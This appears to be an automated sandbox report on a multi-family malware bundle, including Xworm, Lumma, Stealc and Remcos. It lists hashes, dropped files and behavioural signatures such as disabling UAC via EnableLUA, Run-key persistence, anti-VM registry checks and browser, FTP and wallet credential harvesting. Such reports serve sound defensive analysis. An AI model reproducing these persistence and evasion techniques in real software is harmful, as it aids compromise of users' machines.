| SHA1 | 933ee238ef2b9cd33fab812964b63da02283ae40 |
| SHA256 | 02a8c111fd1bb77b7483dc58225b2a2836b58cdaf9fc903f2f2c88a57066cbc0 |
| SHA512 | ac17e6d73922121c1f7c037d1fc30e1367072fdf7d95af344e713274825a03fc90107e024e06fccda21675ee82a2bccad0ae117e55e2b9294d1a0c5056a2031d |
C:\Users\Admin\AppData\Local\Temp\Files\injector.exe
| MD5 | f6aaabbe869f9896e9f42188eeff7bd0 |
| SHA1 | 1efcc84697399da14b1860e196d7effc09616f45 |
| SHA256 | 0a0051921bf902df467a3faf3eb43cee8e9b26fbc3582861b2498ec2728bb641 |
| SHA512 | 7e95891540121e2c15b7f2ce51155fc3a6feefb9b493e2aa550a94b6a00f25ac47a946beb5096bdd6ebc2ac8eeac606f8e372f07d56bba3d697552b2f330aa10 |
C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe
| MD5 | 28236bd9a2fc826c072bef5a59fc5a9b |
| SHA1 | 72d7d9854d05e309e05b218a4af250143a474489 |
| SHA256 | ce5b382a28974c9d244d9fa72356d1e0508f75be24e7cd4045b40db5431bee54 |
| SHA512 | 7e56738851c3552650f2c81b7ff7a30c0135c7b9074a77260e3835ff4572ac2af2a5a3cbd01c7d1d97aeafd9dae91b3e2821ef459550d33c5c4ea5d7a1742c74 |
C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe
| MD5 | e021ad0649b6e06642965239a0f1dffb |
| SHA1 | 94da03a329d00a4efebff2cfb18471076326b207 |
| SHA256 | a872ab63fd3e70627d7bf28a74045a5fca407d79a950ac1fdbcecd6b7672469f |
| SHA512 | e549f1371f5755b684a4a5369492400f61920edfd4b9e0187784b4533219ae77fa48248ad90c54b2f1d63da80821ad620455ed7fa7ac7f2850d5b574d8a5aa43 |
C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe
| MD5 | 011f3bebde38bdac8ceaebfbff201f4a |
| SHA1 | bb5769d029c5f202e823e038aab2aae454cf0299 |
| SHA256 | b6ad170d197d557e308b9356d0f87653eb463cf74a48cbb50ce74c7260c315c2 |
| SHA512 | 161838d1df3f6b7d7c2d61f98fc5fc55a30281e24433a5fc49a52aad0182bd5c5d581ba294c2a96878d93dc8536499d79a08f8aac879dc0eb5bee7f46b429cdf |
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe
| MD5 | 23c8cb1226c61a164d7518218c837b81 |
| SHA1 | 45ea74832e487bacb788189c04661b29a71e86b5 |
| SHA256 | 21aaa5319a6729df0581203a0782ead837b848387e44cd1844ca8e19882a50af |
| SHA512 | 8e219108c05966ec8ee6bc2ce2fb40c4aedce6614e65970c356e4f840e88720188c762aaa4451c2f5f1fa1bbc14136ecbcd1f4c9f3b1a5fccc0ab053a37bcc21 |
C:\Users\Admin\AppData\Local\Temp\Files\shell.exe
| MD5 | 156b3dd7b265fdbeb2ade043097d069b |
| SHA1 | 58d37918893d2109804c79f93316570a74aa2855 |
| SHA256 | da47b99da4257ab831799c5d2fb02086c093511988fb4239aab3a57dab00c049 |
| SHA512 | 43d28d9f5b32e8acea884380ef733eaf51b9110c6fe334ab2d9551319c3f4b7e235f08b1f3f26fb5914b6973586e6089f14f7aceebcf110ca40f492f963fdea5 |
C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe
| MD5 | b3de5ec01cfa2163f0f62efb3bf41171 |
| SHA1 | 163f6648d92e9a7e11667d5b20afc05ddb2cda89 |
| SHA256 | d55d43e8ddbba6faacaef5a6884a776162d8350212d44f02fbc8b853d8275984 |
| SHA512 | d03607bd69942cd775f8c526fbd986bcb04eb06d4b03c83781193eb08cd2bccd4977acfe967fde6b622c1306bac514501f900207f3ce8702c69565e31b7246b8 |
C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe
| MD5 | dc860de2a24ea3e15c496582af59b9cb |
| SHA1 | 10b23badfb0b31fdeabd8df757a905e394201ec3 |
| SHA256 | 9211154f8bd85ce85c52cfe91538e6ba2a25704b6efb84c64460ba4da20fa1a9 |
| SHA512 | 132dad93963cd019fa8fc012f4c780d2ab557e9053afe3f7d4334e247deb77c07bb01c8c5f9c05e9c721d3fe8e6ec29af83b7bb7bf1ad925fae7695ed5cfc3db |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-12 18:19
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
299s
Max time network
300s
Command Line
Signatures
44Caliber
44Caliber family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
RMS
Rms family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5492 created 1652 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe |
| PID 6584 created 5340 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\rascqn.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
Credentials from Password Stores: Windows Credential Manager
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Checks installed software on the system
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\MicrosoftProfile | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\xda | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
